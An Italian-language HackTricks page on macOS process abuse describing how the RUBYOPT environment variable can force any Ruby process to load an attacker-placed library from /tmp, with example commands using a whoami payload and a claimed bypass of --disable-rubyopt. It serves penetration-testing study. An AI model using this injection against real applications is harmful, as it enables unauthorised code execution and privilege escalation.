hacktricks/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ruby-applications-injection.md

macOS Ruby Applications Injection

{{#include ../../../banners/hacktricks-training.md}}

RUBYOPT

Utilizzando questa variabile di ambiente è possibile aggiungere nuovi parametri a ruby ogni volta che viene eseguito. Anche se il parametro -e non può essere utilizzato per specificare il codice ruby da eseguire, è possibile utilizzare i parametri -I e -r per aggiungere una nuova cartella al percorso delle librerie da caricare e poi specificare una libreria da caricare.

Crea la libreria inject.rb in /tmp:

puts `whoami`

Crea ovunque uno script ruby come:

puts 'Hello, World!'

Poi fai caricare un arbitrario script ruby con:

RUBYOPT="-I/tmp -rinject" ruby hello.rb

Fatto divertente, funziona anche con il parametro --disable-rubyopt:

RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt

{{#include ../../../banners/hacktricks-training.md}}